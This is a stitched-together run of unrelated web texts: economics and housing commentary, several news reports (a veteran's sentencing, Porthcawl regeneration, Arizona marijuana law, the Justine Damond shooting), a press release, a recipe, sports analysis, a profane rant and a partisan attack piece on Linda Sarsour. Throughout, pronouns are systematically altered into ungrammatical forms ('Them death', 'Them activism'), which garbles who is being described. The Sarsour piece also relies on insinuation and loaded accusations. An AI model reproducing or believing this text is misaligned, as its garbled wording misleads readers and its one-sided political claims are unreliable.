California and Florida both had major home price appreciation and relied heavily on the housing bubble. Both areas have seen bubbles pop. The difference however is that Florida prices have come down to more reasonable levels. California prices are still too high. A reasonable metric is 3 times annual household income for home prices (both Texas and Florida are close to that range). California is still out of that range. So why are economic problems still deep? Because current income data will be lowed when Census data comes out in September and that is not reflected above.
The ability for Wall Street to turn many things into a commodity has allowed them to gamble and speculate on the well being of middle class Americans. Housing prices would not have gone into a massive bubble without banks pushing other people's money out the door. Wall Street is good at taking risk when their money is not at stake. They are fine taking the biggest risk since they know the U.S. taxpayer will be on the hook eventually for their irresponsible decisions with a large safety new. Do you think banks would have loaned out of their own treasury like they did if it was their money on the table? Of course not. Yet if something isn't changed then middle class Americans are going to find it harder and harder to stay afloat while debt starts coming down over them like a tsunami.
It is time to break the chains from the Wall Street banks. Split them up. There is no need to have commercial and investment banking comingled. The banking needs for most Americans are simple. Why mix it up with banks that now operate like hedge funds and take needless risk? If there is no change, people are going to start seeing more and more of their paycheck going to servicing debt and guess who ends up with that money in the end?
If you enjoyed this post click here to subscribe to a complete feed and stay up to date with today's challenging market!
A former soldier with post-traumatic stress disorder was told by an Edmonton judge to “suck it up” and “take personal responsibility” as they were sentenced Tuesday for domestic violence.
Court of Queen's Bench Justice Sterling Sanderman spoke to Darrell Schubert — a combat engineer who survived a bomb explosion during a tour in Afghanistan — about the “greatest generation,” a term coined by a journalist to describe, in part, those who fought in the Second World War.
Sanderman said many of those veterans came home likely suffering PTSD-like symptoms, but said they sucked it up as they returned to work, got married and had families and lived productive lives.
The judge conceded Schubert has had difficulties as a result of their combat experience, however they told them they need to take some “personal responsibility” for their actions and their situation, and move on with their life.
Schubert, who was wearing their combat ribbon in court, told Sanderman they were prepared to take responsibility.
Schubert, 28, was sentenced to four months in jail, followed by two years of probation, after pleading guilty to assault with a weapon, uttering death threats, possession of a weapon and two breaches of a probation order.
According to agreed facts, Schubert was living with Beverly Gardner in a Terwillegar-area apartment in May 2014. They had been diagnosed with PTSD and recently been dismissed from the military and was drinking a lot of alcohol.
On May 11, 2014, Schubert and Gardner were drinking at home. Schubert was angry at kids running in the hallways and upset about their past with their mother.
They directed their anger at Gardner and, while brandishing a pellet handgun, indicated they were “going to show her” and that they were “going to teach everybody a lesson.”
A fearful Gardner fled the home and spent the night with a friend, however they returned to the apartment the next morning with their brother so they could pack up their things.
Schubert became angry and armed themselves with a steak knife before confronting them in the bedroom, threatening to “kill her, their brother and their family if they left.”
After Gardner threw their bag from the balcony down to where their brother was, Schubert told them they were going to go and kill their brother and left with the knife.
Schubert was arrested by police in the parking lot and said they wished the police had shot him.
In a victim impact statement, Gardner said they feel they are “living a nightmare” while suffering flashbacks. They have moved for safety reasons.
Defence lawyer Zack Elias told court Schubert was in the military for 7-1/2 years and spent 7-1/2 months in Afghanistan in 2010. While there, they were nearby when an improvised explosive device injured others.
Schubert apologized for their actions in court. “I want nothing but to get myself better,” they said. “I have problems and I want to fix them. That's all I want.”
"The Max Planck Society is Germany's most successful research organization. Since its establishment in 1948, no fewer than 18 Nobel laureates have emerged from the ranks of its scientists, putting it on a par with the best and most prestigious research institutions worldwide. The more than 15,000 publications each year in internationally renowned scientific journals are proof of the outstanding research work conducted at Max Planck Institutes – and many of those articles are among the most-cited publications in the relevant field." ( Source )
Institute
Max Planck Institute of Neurobiology
The Max Planck Institute of Neurobiology (MPIN) is situated in Martinsried, at the Southwest border of Munich. The institute is devoted to basic research and investigates the basic function, structure, development and plasticity of the central nervous system.
The area of research covered by scientists at the institute can be illustrated by way of the following example: While you read this text, your brain monitors and controls the function of your organs, calculates and coordinates even the minutest movement, particularly of the eyes, and analyses the incoming information from your various senses. But how does the brain manage to process all this information at once? How are its nerve cells connected in order to enable this? How does such a complex system develop and how does it learn? What happens on the molecular level right up to the synapses, the cells and the circuits?
These are only some of the questions occupying the scientists at our institute. Since their research takes them to the very boundaries of human knowledge, such questions are studied not on human beings, but by employing computer simulations, cell cultures and animal models instead. (Source)
RALEIGH, N.C.--(BUSINESS WIRE)--IAT Insurance Group ownership and management announced today the company will pay a $3,000 bonus to all non-executive employees on January 15, 2018. The additional bonus comes in response to the newly passed tax reform bill – the tax savings will be shared with approximately 700 employees. IAT Insurance Group is a privately held company owned by the Kellogg family.
The tax reform bill promises a lower tax rate for companies like IAT Insurance Group. How companies manage that extra money will go a long way toward determining how well the new tax changes work for our economy. “This plan has the power to grow the economy, but only if we invest in the people who make our company great – our employees and customers. That's why, as owners, we will invest these savings in our workforce and our business in a way that works for everyone,” said Peter Kellogg, Chairman, IAT Insurance Group. “It's important to us to do our part to help economic growth by putting this money into the hands of the people who will benefit the most from it.”
The $3,000 bonus will be paid on January 15, and is in addition to the company's other compensation and benefit programs, which include a 401k with 100% company matching contributions up to 7% with immediate vesting, and an additional 3% profit sharing distribution for all eligible employees. The company's annual bonus pool is also up from last year and incentive bonuses, of which 100% of IAT employees are eligible, will be issued at the end of first quarter 2018. “Our employees drive the success of IAT and our compensation programs recognize and reward their value to the company,” said Bill Cunningham, CEO, IAT Insurance Group. “The tax savings gives us an extra opportunity to share even more with our team, especially frontline and non-executive employees.”
About IAT Insurance
IAT Insurance Group is a privately owned, specialty insurance company providing property and casualty products for businesses and individuals. With 700 employees and 13 offices across the country, we go to market through six business units – Commercial Transportation, Specialty, Programs, Inland Marine, Surplus Lines Excess, and Assumed Reinsurance. The IAT Insurance Group companies are rated A- Excellent by A.M. Best. Learn more about the company at www.iatinsurancegroup.com.
Today I received my first color gift!
This was my first time selecting International and actually getting matched Internationally. I was so excited, even more when I realized my package was coming via Royal Mail!
Then today, I made my husband go and check on the mail.... and voila!! It was here.. I looked at it carefully and inspected it. My cats even checked it out with me.
Then I opened it and... Oh, I forgot to say.. my color was forest green! There was beautiful postcard from... IRELAND!!!
Talk about perfect for someone who loves green. Beneath the postcard was the freaking cutest leprechaun outfit I have ever seen! I'm expecting in August..so this is going to be the best Halloween outfit ever for my new babe! My husband looked at me like I was nuts, but I couldn't stop grinning. I can't wait to show it off!
My Santa thought this was a bit risky.. but I would say they did very well!! And I can't believe there is another gift on the way. I'll update as soon as its received. Thank you Irish Santa!! :)
They said Muslim kids are being “executed” in the United States. The Obama White House called them a “champion of change.”
When it comes the political left's favorite Islamists, they have chosen a champion in Linda Sarsour. You may have seen them on a CBS panel of ordinary Muslim Americans. Perhaps you've seen them discussing the struggles of fasting on Ramadan in a new Huffington Post video; or, maybe you read the glowing profile of their last year in The New York Times.
Sarsour is the executive director of the Arab American Association of New York (AAANY).  They are an activist with political aspirations and they make it a point to be seen at the events of any and every social justice cause known to man. Recently, they were featured on the cover of the ACLU's magazine Stand. Them activism even led them to be honored by the White House as a “champion of change.” Because of their close connection to New York Mayor, Bill de Blasio, their organization AAANY was able to secure millions in funding from the Mayor's Fund.
Last year, Sarsour caused a stir when they announced that they were going to the Democratic National Convention as an at-large delegate and couldn't decide if they were “going to behave or not.” In an interview with Politico, Sarsour explained that “not behaving is protesting” and that “the onus is on the party to make sure our voices are heard.”
Who is the real Linda Sarsour, and what views do they “voice” that need to be heard? Here are a few things the journalists writing glowing reviews of Sarsour kept out of their articles.
When they aren't busy vainly promoting themselves and vying for people's attention, they were stumping for Presidential candidate Sen. Bernie Sanders. According to the leftist Israeli newspaper Haaretz, they told a crowd of Bernie supporters in New York that they support them because they “cares about the Israeli-Palestinian conflict.” Sanders has been strongly critical of Israel.
Sarsour likes to highlight their support for a Jewish presidential candidate, and has made pronouncements condemning the use of anti-Semitic language. They have received condemnation from their Palestinian compatriots for recognizing Israel's existence. However, they themselves have a long history of anti-Jewish and anti-Israel statements.
In addition to supporting the discriminatory and terror-tied BDS Movement, they claim that “nothing is creepier” than the Jewish right to self-determination. They regularly jump onto Twitter to attack Israel.
They have hysterically claimed that Muslim kids are being “executed” in the United States, and claims that the CIA was behind the underwear bomber.
They falsely claim that “Palestine existed before the State of Israel,” and expresses hopes to one day “bring back” a Palestinian State. No such State has ever existed. They have promoted the misleading image of Israel that describes the “loss” of Palestinian lands, which was once used by MSNBC. MSNBC later admitted the image was false.
They have called for people to show solidarity with Muhammad Allan, a member of the terrorist group Palestinian Islamic Jihad. Allan has a history of recruiting suicide bombers.
Despite having a wife in the spotlight, Sarsour's husband, Maher Judeh (a.k.a., Maher Abo Tamer) believes that Muslim women should censor themselves on social media, saying “they can socialize on Facebook with friends but to an extent [sic].” Judeh works as a cashier at a deli/convenience store in Brooklyn. The deli is known for selling alcohol to minors.
In the past, Judeh has expresses a fondness for Fatah. They praised Palestinian Authority police officer Amjad Sukkari “Abu Omar” as a hero. Sukkari carried out a shooting attack at a checkpoint in Israel. They mourned the death of the brothers (and Hamas “master terrorists”) Adel and Imad Awadallah. [1] [2] [3] [4]. Judeh has also spoken of the founder of the Popular Front for the Liberation of Palestine (PFLP), George Habash, in glowing terms. Habash has been describes by some as the “godfather of Middle East terrorism.” Judeh at one point in time was allegedly facing deportation.
Sarsour has solicited donations for the Palestine Children's Relief Fund (PCRF). This is an organization whose founder, Stephen Sosebee, has justified acts of terrorism attacks as “revenge.” PCRF regularly took money from the Hamas fundraising group The Holy Land Foundation; PCRF was also considered a “Partner Organization” of Al-Awda, the Palestinian Right To Return Coalition.
Al-Awda is an organization that promotes the destruction of the State of Israel and the views of terrorist groups. It routinely utilizes the slogan “from the river to the sea,” a clear call for Israel's destruction.
Al-Awda co-founder and Hezbollah fan, Abbas Hamideh, categorizes Jews as either “real Jews” or “Zionists.” They regularly praise Hezbollah and their leader Sayyed Hasan Nasrallah, calling them “the most honorable man on the face of the earth.” Additionally, Hamideh calls for the entire region to be ethnically cleansed of Jews (all in the name of ‘justice' of course).
Sarsour has more than just a third degree association with Al-Awda and Hamideh. They have attended numerous rallies sponsored by Al-Awda; promoted and solicited donations for their events; and they have spoken at their rallies. You can regularly find Sarsour and Hamideh playfully teasing each other on Twitter [1] [2] [3].
Not only is Sarsour associated with Hezbollah groupies, in a 2004 article, Sarsour revealed that men pictured in an Arab newspaper recruiting suicide bombers for Hamas were relatives and friends. One of them was their brother-in-law.
In addition to their associations, Sarsour's finances are suspect as well. AAANY financial disclosure forms show they do not receive a high salary for their 50 hour per week job (50 hours according to the forms). They claim that they choose work that does not pay big bucks, often describing themselves as a “struggling activist.” They even needed to create a GoFundMe campaign in order to pay for their attendance as a delegate at the Democratic National Convention.
This all seems consistent, yet in 2013, while kibitzing with their Hezbollah-loving bestie Hamideh, they remarked that they do not get money back while when filing taxes. This is fascinating. A “struggling” working mother of three, who needed to publicly solicit funds just to travel 90 miles from New York to Philadelphia, does not get any money back when filing taxes? Perhaps, their husband makes a sizable income?
This financial inconsistency, while perhaps small, may be the subject of future scrutiny should they consider running for political office in the future.
Sarsour is seen as a rising star in the Democratic Party. However, when she's not busy with narcissistic self-promotion, they spew hatred. As the Democratic National Convention grows closer, it will become more apparent that Democrats need to take a hard look at the people they see as role models.
Get the biggest daily stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
ONE of the UK's leading housebuilders and Cardiff-based property developers have made a multi-million-pound bid to develop housing, leisure, retail and community facilities on Porthcawl's Salt Lake site.
Persimmon and PMG's initial £4m offer for the land allocated for phase one of the stalled Porthcawl regeneration scheme is being backed by the Evans family, which holds the lease for the Bridgend County Borough Council-owned land.
A letter sent to councillors by property services company DTZ, which represents the Evans family, states failure to proceed with this latest development “would be fatal to Porthcawl's regeneration prospects”.
It is understood Persimmon and PMG have offered an initial payment on completion of sale of £4m and claim further payments, which would be made to Bridgend council as housing units and projects are completed on the site, could exceed £18m.
Leaked documents show the proposed scheme has allocated land for 450 housing units “similar to the existing Porthcawl street scenes of Hillsboro Place, Mary Street and Esplanade Avenue”, has allocated land for a health centre, community facilities and the Grace Centre – which will be used for worship and other uses – retail, including a supermarket and an unspecified leisure development.
The documents also state that a hotel may be built as part of the scheme and that the Evans family, which runs the Coney Beach funfair, would be willing to purchase the under-threat Porthcawl Museum building from Bridgend Council at market value and donate it to Porthcawl Town Council if Bridgend Council approves the plan.
Related:
This scheme comes after failed attempts to bring first Tesco and then Morrisons to the site, which was to have acted as a catalyst for regeneration.
In the letter to councillors, DTZ said: “Our clients consider the new proposals to be a great improvement on the previous failed schemes for both practical and aesthetic reasons.”
But it is understood borough council members in Porthcawl have voiced serious concerns about the plan, claiming it lacks basic detail such as who would run the health centre and what leisure facilities would be provided and by who and would not provide enough parking spaces for visitors.
They have also expressed concerns about the lack of financial detail in the plan.
Related:
It is understood they believe that as other regeneration projects such as the community-led Harbourside scheme and Jennings Building redevelopment get underway, other more suitable developments will be attracted to Salt Lake.
Councillor Charles Smith, Cabinet Member for Regeneration and Economic Development at Bridgend County Borough Council, said: “It's important to be absolutely clear that no deal has been reached on this proposal.
“While there are many positive aspects to what has been proposed and the overall vision is not that different to the council's, there are also a number of issues and concerns that must be addressed.
“The council has consistently stated that any regeneration scheme for this site should be conducted by way of an open- market process, and this continues to be the only basis on which we will proceed as an off-market transaction has the potential to be challenged as unlawful.
“The authority is continuing to liaise with the Evans' agents to try and overcome these concerns and move an appropriate scheme forward.
“In the meantime, I would like to reassure residents that the council remains committed towards regeneration in Porthcawl as demonstrated by our recent announcements regarding plans for the Jennings Building and harbourside area around Cosy Corner.
Related: Newton sea defences shored up with £300,000 works
“What we cannot do is agree to any proposed deal for the land around Salt Lake that is not right or which exposes us to undue risks. We remain open-minded, but a key requirement of any sale will be to ensure that this once-in-a-lifetime opportunity provides the type and quality of scheme that is absolutely right for Porthcawl.”
A spokesperson for DTZ, which is acting on behalf of the Evans' family, said: “Our clients have no comment other than to say they remain fully committed to fulfilling their duties under the JV (joint venture) agreement with Bridgend Council and by doing so, seeing a successful development completed for Porthcawl both on phase one and phase two of the Regeneration Scheme.”
Coun Smith added: “An integral part of previous plans for the site has been the inclusion of a large food store. Given the changes in the retail market and the time that has elapsed since those proposals were first considered, it's clear that a new master plan for the area is required so the site can be openly marketed with bids invited for the delivery of a whole or phased scheme.
“The council will be updating residents as soon as there is any further news to announce.”
Also see: Specialist Porthcawl hotel to reopen after £1m investment
OK so I am getting back into the video world with a very appropriate, prim and proper little video about cookies! Mexican Hot Chocolate Snickerdoodles, to be exact. And I blather on about the Aztecs and autumn a bit in the video so I won't overdo it here. But let me just say that they are one of my absolute favorites in the book, you probably already have all the ingredients, and I hope you make them!
Mexican Hot Chocolate Snickerdoodles
Makes 2 dozen Cookies
A beautiful crackle topped chocolate cookie with a spicy cayenne kick and a sugary cinnamon coating. Sold?
For the topping:
1/3 cup sugar
1 teaspoon ground cinnamon
For the cookies:
1/2 cup canola oil
1 cup sugar
1/4 cup pure maple syrup
3 tablespoons almond milk (Or your preferred non-dairy milk)
1 teaspoon vanilla extract
1 teaspoon chocolate extract (or more vanilla extract if you have no chocolate)
1 2/3 cups flour
1/2 cup unsweetened cocoa powder
1 teaspoon baking soda
1/4 teaspoon salt
1/2 teaspoon cinnamon
1/2 teaspoon cayenne
Preheat oven to 350 F. Line 2 large baking sheets with parchment paper.
Mix the topping ingredients together on a flat plate. Set aside.
In a medium mixing bowl, use a fork to vigorously mix together oil, sugar, syrup, and milk. Mix in extracts.
Sift in remaining ingredients, stirring as you add them. Once all ingredients are added mix until you've got a pliable dough.
Roll dough into walnut sized balls. Pat into the sugar topping to flatten into roughly 2 inch discs. Transfer to baking sheet, sugar side up, at least 2 inches apart (they do spread). This should be easy as the the bottom of the cookies should just stick to your fingers so you can just flip them over onto the baking sheet. Bake for 10 to 12 minutes, they should be a bit of spread and crackly on top. Remove from oven and let cool for 5 minutes, then transfer to a cooling rack to cool completely.
From Vegan Cookies Invade Your Cookie Jar
On Tuesday, President Trump, speaking from Judea and Samaria while standing next to master terrorist supporter Palestinian dictator Mahmoud Abbas, tore into the Islamic terrorists responsible for the bombing of an Ariana Grande concert in Manchester on Monday evening. “So many young, beautiful, innocent people living and enjoying their lives murdered by evil losers in life,” Trump stated. “I won't call them monsters, because they would like that term. They would think that's a great name. I will call them from now on losers, because that's what they are. They're losers, and we'll have more of them, but they're losers. Just remember that.”
Some on the Left, predictably, thought Trump's language was childish.
Trump on the Manchester attack: "So many people killed by evil losers." They sound like a high school girl reacting to their hair being pulled. — Una Hajdari (@UnaHajdari) May 23, 2017
Trump sounds like a 3rd grader name calling terrorists "Evil Losers". Is this how a President is supposed to act? — Alan Greenspan (@spangreen) May 23, 2017
Here's the thing: Trump is absolutely right.
Every time there is an Islamic terrorist attack, people immediately jump to trying to understand the mind of the terrorist. What drove them to blow themselves up in a pizzeria or at a dance club? What made them pick up a gun and mow down patrons at a gay bar? Why would they drive a truck through a Christmas market?
We all know the answer: Islamic extremism.
But by continually asking the question — and then answering it with various laments about poverty or lack of opportunity — we put the onus on ourselves to answer the charge implicit in terrorism: that the terrorists are the actual victims, and that they have somehow been wronged.
Here's the truth: they haven't been wronged. They are, as President Trump says, merely evil losers. They deserve no answer, no sympathy. They require no explanation from us. Those who would murder children at a pop concert ought to be killed at the earliest available opportunity — and we shouldn't bother trying to decrypt “how” the “monsters” were created. That's because they're not “monsters” at all. They're human beings who believe evil things, and they are losers who aren't winning any battles in heaven or on earth. Their names will disappear from history, their souls burn in eternity.
Trump is also right that we must stop using the language of strength to describe those who act out of weakness. If you have to blow up 13-year-old girls listening to teeny pop material, you're not a powerful “monster.” You're a worm, a feeble piece of human refuse. We should describe terrorists with contempt, not build them up in their own minds. Islamic terrorists feed off the notion that the West lives in fear of them. We live in fear of the things they will do, obviously, but we don't live in fear of them — because they're ridiculous and puny human beings. Ridiculous and puny human beings can harm innocent people, too. But handing them an unearned moniker like “monster” — scary by nature — is counterproductive, and boosts egos where no boost is necessary.
So, good for Trump. Trump knows well how to demean people, make them feel smaller. And Islamic terrorists should be scorned, derided, mocked, and treated as small. They're not martyrs, they're not warriors, they're not victims. They're evil losers.
PHOENIX (Reuters) - Arizona will file a lawsuit in federal court to learn whether a controversial medical marijuana law passed by voters last November is legal, Arizona's governor said on Tuesday.
Republican Governor Jan Brewer said the state will file the court action by Friday to make sure that Arizona does not put state workers and consumers in jeopardy as it implements its voter-sanctioned Medical Marijuana Act.
The decision to seek clarification comes after the U.S. Attorney for Arizona, Dennis Burke, warned in a letter to state health officials earlier this month that the cultivation, sale and distribution of marijuana is still against federal law and subject to prosecution.
In it, Burke said they would “vigorously prosecute individuals and organizations that participate in unlawful manufacturing, distribution and marketing activity involving marijuana, even if such activities are permitted under state law.”
Brewer said they want to follow voter's wishes, but remains concerned.
“I won't stand aside while state employees and average Arizonans acting in good faith are unwittingly put at risk,” they said in a prepared statement released Tuesday.
“In light of the explicit warnings on this issue offered by Arizona's U.S. Attorney, as well as many other federal prosecutors, clarity and judicial direction are in order,” they added.
Arizona became the 15th state in the nation to approve medical marijuana. Last November, voters gave the go-ahead to a ballot measure by a razor-thin margin.
The state has been accepting applications from individuals seeking to used marijuana for medical purposes since April.
Figures show that 3,696 people have been given cards to use marijuana for a range of medical problems, with the bulk of the users approved because of chronic pain.
The legal action also comes as the state readied to accept applications statewide on June 1 for those seeking to dispense the drug under the new law. There will be 125 dispensaries allowed under Arizona Department of Health Service rules.
Officials have said the dispensaries would start operating in late September or early October. But a governor's aide told Reuters that Brewer wants to put the dispensary part of the law on hold pending a decision on the legal case.
The single biggest name on the NBA trade market (at least publicly) is Houston Rockets center Omer Asik. For the non-diehard fans, Asik is currently the “backup” center to Dwight Howard in Houston, making them utterly expendable despite the fact that they are an above-average center in a league that doesn't have many above-average centers.
Before you scream about why we're discussing the Rockets center on an Atlanta sports blog, there is a reason, as Asik has been named in multiple rumors involving the Hawks and two of their valuable pieces. The most highly-discussed rumor centers around Hawks power forward Paul Millsap, as the Rockets have been thought to be targeting Millsap as their “ideal” candidate for an Asik move.
For starters, the salaries are a near perfect match, as Asik's salary cap number (we'll come back to this) sits at $8.3 million per season for 2013-2014 and 2014-2015, while Millsap is owed $9.5 million per year in both of those campaigns. This would basically be a straight-up trade (at least it appears that way) if it were to happen, with the Hawks presumably shifting Al Horford to their “natural” position of power forward and slotting Asik alongside him.
The second scenario would involve some combination of Lou Williams (and their pristine contract) and cap filler in exchange for Asik. To be fair, this one hasn't been peddled much by the national media, but several local outlets have mentioned Williams as a piece to the deal, and it does make some sense. Williams signed a 3-year, $15.675 million contract with the Hawks prior to the 2012-2013 season, and they are making between 5 and 5.5 million dollars per season over the same length as Asik and Millsap.
Okay. Now that we know the particulars of the rumor, it's time to place some “analysis” on the festivities, and for me, it's pretty simple.
The Hawks should say “no thanks” to either possibility.
First, the narrative that the Hawks are in desperate need of a center is overblown for me. There are only a (small) handful of match-ups where Al Horford is physically over-matched against a “dominant” NBA center, and shifting the entire roster composition to fit those few face-offs would be shortsighted in my view. There is certainly a full post in itself concerning whether Horford is better at the 4 or 5 positions (I think he's better at center, FWIW), but we won't dive too deep here.
As far as the actual specifics of each trade possibility, I would counsel Danny Ferry against both for different reasons. A Asik-for-Millsap swap does make all kinds of salary cap sense, but Asik is actually owed more money than Millsap due to their “poison pill” provision that pays them $15 million next season (something that Hawks ownership certainly wouldn't enjoy, despite the relatively low cap number).
Add to that the fact that Paul Millsap is simply a much better basketball player than Asik (Asik is an elite defender, but is a trainwreck offensively, as evidenced by their efficiency numbers), and because of the fact that Asik has openly pouted this season, Millsap also owns the better pure “trade value” on the open market. We could get deep into the numbers here (Millsap leads strongly in PER, Win Shares, etc.), but when the biggest argument is a positional change for Al Horford, it's time to say no.
On the Williams front, the decision is certainly a closer one for me. Any longtime reader of mine would know that I'm firmly in the tank for Lou, but they haven't quite been the efficiency monster in Atlanta that they were in Philadelphia, and their status as a combo guard on a team with a budding star (we hope) at the point guard position and a 2013 1st-round pick in the backcourt is a bit turbulent. Still, Williams is the best shooting guard on the roster if you think Kyle Korver is “really” a small forward (I do), and they present a different dynamic than any bench option on the team in terms of shot creation.
Asik for Williams would be an intriguing swap for the Hawks if all things were equal but, again, they are not. Asik is owed $20 million in real money and nearly $17 in cap hits for this year and next year, and Williams makes just about half of that in real dollars and about $6 million less against the cap. The Williams signing that brought them “home” to Atlanta was a vast underpayment in my view, and it serves as a big-time bargain in a league filled with ugly contracts for players in the mid-level tier that Williams occupies. Throw in the fact that the Hawks would have to add in more pieces (or picks, etc.) and leave themselves with a giant offensive void on the perimeter, and a deal centered around Lou falls off the table for me.
—–
To be fair, I should certainly include the fact that I would love to see Omer Asik in a Hawks uniform. He's one of the best rebounders in the entire NBA when he's got it going (career 13.1 rebounds per 36 minutes), and it certainly wouldn't hurt to have a legitimate 7-footer to protect the rim. With that said, Asik isn't the perfect fit that some would believe, and because of the fact that the Hawks would have to either part with Millsap (alone) or Williams (with additional parts), it's time to sit this one out.
What a tragedy some say, that a 400 pound endangered, majestic animal was shot in the name of saving a four-year-old child. How absent and neglectful the mother must have been for allowing their child to find themselves inside of this enclosure that houses a massive, wild animal. Brought to you by: thousands of people who wouldn't give a flying fuck about most things in their day-to-day life, have stumbled on Facebook for 5 minutes during their Monday morning shit to create this egregious, dramatic internet catastrophe that's the latest, and greatest thing to pour all their bitter hatred into. For two days. ‘Cause lord knows, we're really great at pretending to vehemently care about something for like a week, max. After that, the Facebook feed gets a little too long, and the Friday beers a little too sweet, to give a fuck about a gorilla that's half a world away, for most of us. Please don't confuse that statement as me saying that it's not worth something caring about, but can we be fucking real for two seconds?
Do you remember when Cecil the fucking lion was the biggest rampage happening around Facebook that lasted a grand total of 4 days? The climax of the whole ordeal being a staged protest of around 6 people at that Dentist's office? My god. Wasn't it just, awe-inspiring how we all put aside our shitty personalities and our borderline drinking problems to become aggressively impassioned conservationists, over night. Jane Goodall was just, so proud. So proud that we shared the same news story in an overly hateful post about how it's people like HIM that make the world an evil, unliveable place. No. It's people like YOU. Yes you.
Seen above, an accurate depiction of the seriousness of these stories.
People like you, that delight and revel in contributing to the internet, hating machine. The Facebook shares, the subreddits, the tweets. These are the platforms that pump out stories mildly divisive in nature and turns them into obnoxiously polarized issues, for such a minuscule amount of time. The same amount of time it takes me to make a cappuccino, poop in it, and deliver it to the door of whoever is pissing me off that week. (Where is Uganda? Who knows, but I know I'm mad about something that's happening there.) Or at least rant about it on Facebook. #icareaboutthings
Here's another stain on our “cultural” heritage. Remember when #kony2012 was a thing? I didn't think so. Joseph Kony ('cause I know, KNOW, you don't know their first fuckin' name), started becoming prevalent with the LRA after the Ugandan Bush War which ended in 1986. 1986! It took the first world, what, 26 years of child solider recruitment into their backwards ass Christian cult before we realized/gave a shit/Facebook shared/tweeted that it was happening?! Then the infamous year of 2012, some asshole released a 30 minute video of their time trekking around Africa and the internet COLLECTIVELY lost their shit, again, for like 20 days. Then it was over! After the 4th day it turned into one big fuckin' cartoon. Carl Weathers became a thing, the founder masturbated in public and we all ended up disenchanted … again.
Here's a straight up, blatant example of how hard we suck at caring about things. #overit
And now, here we are, again. This is a familiar place hey? Something has happened and we're all shitting our unified pants over this incident that has nothing to do with us, and will likely be over in a day or two. Someone will write the mother a death threat, someone else will petition to shut down all zoos, forever. In an effort to create this illusion that we're caring, and concerned people. When really, all we want to do is get back to our televisions and our alcoholism. That is not to say that you shouldn't care, or that caring somehow, is wrong. This is to say, that you all suck at caring. Why don't you get the fuck off Facebook, aiight? I promise that not one person is interested in your rants, your comments, your letters of disapproval. ALL OF YOU. If you want to care, stop caring about people noticing your caring. Go and actually do something. Volunteer, donate money, offer free classes on how to be a better parent. WHATEVER. If you feed the hating machine and then forget that it was a thing like countless other trends, you are 100% a part of the problem, and I will 100% poop in your coffee.
See below a comprehensive guide of the steps you should take if you find something offensive on the internet:
Advertisements
Every once in a while, an interview stands out. The one with, Erwan Macé was one of them.
I met Erwan in unusual circumstances. I was Paris for LeWeb, Europe's most important web conference, surrounded by Lebanese, Jordanian and Saudi entrepreneurs who came all this way to showcase the region's dynamism. After two days of intense interviewing about the MENA region I met with Macé, a French entrepreneur living in Singapore who's developing an app to facilitate Muslims' everyday lives. Twenty minutes into the interview, a cleaning person interrupted us to thank Macé for their app, which they and their family use daily!
It's understandable: MuslimPro is a useful app and easy to use. When it launched, at the end of Ramadan 2010, its only function was to reminder users of the time of the five prayers based on their location. At that time, there were many apps with the same mission – around 200 according to Macé – but MuslimPro stood out, probably because it was build by a web professional and not a cleric,and thus focused on user experience, and because it had been developed in three languages, Indonesian, English, and French.
Since then, the app expanded. Now available in 15 languages, it offers new functionalities including the Qibla (indicating the direction of the Kaaba), audio recording, translation of the Qu'ran in 15 languages, a calendar with all the Muslim holidays, greeting cards, and a listing of close halal restaurants based on Foursquare API.
The app has been downloaded 9 million times on both iOS and Android.
This was an unexpected success. During the first year, MuslimPro was only a side project for Macé to test the Indonesian market, which they believed was going to be the next big web market. A few weeks on, they realized that the app was actually getting a lot of traction in Western countries with strong Muslim minorities. This is still true today, and you can find countries like France, the US, and Germany in the list of the app's top 10 countries.
For now, MuslimPro is getting 55% of its revenue from in-app purchases – you can download retro or international muezzin calls for your prayer reminders – and 45% from advertismenet.
In the long term, Erwan wants to turn Muslim Pro into a Muslim community platform. He's thinking about a slew of new services like a halal food review service, a traditional dating service – think Et3arraf – and even a social media branch.
At the end if the day, community is Muslim Pro's strength. Thanks to its focus on user experience, Macé managed to create an engaged and qualified community, on which they could rely to launch new social services.
Investigators are probing the psychological and medical health records of the two Minneapolis police officers involved in the fatal shooting of Australian woman Justine Damond two months ago.
The independent body investigating Damond's death, the Bureau of Criminal Apprehension (BCA), has applied in court to access the unredacted personnel files and medical records of officers Mohamed Noor and Matthew Harrity, the Star Tribune reports.
Yoga instructor and life coach Justine Damond from Sydney's Northern Beaches was shot dead by Officer Noor behind their Minneapolis home on the night of July 15. The two officers were responding to their emergency call about a possible sexual assault in the back alley.
Them death sparked international outrage and led to the resignation of Minneapolis Police Chief Janee Harteau.
In requesting the warrant, the BCA said the records "may assist with the investigation".
Facebook Justine Damond from Sydney was shot by one of the officers responding to their '911' about a suspected sexual assault.
The investigative body has requested any remaining data on the officers, including "medical files that contain pre-employment psychological exams, the unredacted personnel files, and the pre-employment background investigations," according to the warrant.
The police command has already handed over the officers' body camera videos, the patrol car Officer Noor reportedly fired from, the officers' mobile phones and audio of the two '911' calls made by Damond that night.
But officers Noor and Harrity did not have their body cameras switched on when Noor fired their weapon, and what happened in the moments leading up to Damond's death remains unclear.
Officer Noor -- who had been placed in an accelerated eight-month police training program before joining the force -- has refused to be interviewed by investigators or to speak publicly about what happened that night.
A search warrant obtained in July claimed a woman "slapped" the back of the patrol car just before the Australian bride-to-be was shot, although it didn't specify if the woman was Damond or whether this was the "loud sound" which reportedly startled fellow officer, Matthew Harrity.
AFP/Getty Images Justine's death sparked protest marches in Minneapolis. It's the third fatal police shooting in the city in two years.
"Upon police arrival, a female 'slaps' the back of the patrol squad ... After that, it is unknown to BCA agents what exactly happened, but the female became deceased in the alley," the warrant stated, according to Minneapolis Public Radio (MPR).
Hennepin County Attorney Mike Freeman said last week they would decide whether to file charges against Officer Noor over the fatal shooting by the end of the year.
There is mounting pressure on investigators to charge the Minneapolis officer.
One long-time critic of Minneapolis police and president of Communities United Against Police Brutality, Michelle Gross told the Star Tribune, "They don't seem to take nearly this long in cases in which a community member is shooting someone".
BCA gets warrant for training records of officer Noor, who fatally shot Justine Damond https://t.co/rBMRuF40wh pic.twitter.com/Z4CRgxbaaO — Star Tribune (@StarTribune) August 4, 2017
But Freeman defended the lengthy investigation, saying four to six months was a normal timeframe for such cases.
"We have received some emails and phone calls from members of the community demanding that we charge the officer immediately and ascribing all kinds of nefarious reasons as to why we haven't done so," they said in a statement.
"The truth is, we are following the same procedure we have with the three previous officer-involved shootings."
Ever wondered how much each influential Game of Thrones family in the Seven Kingdoms of Westeros is worth? Wonder no more!
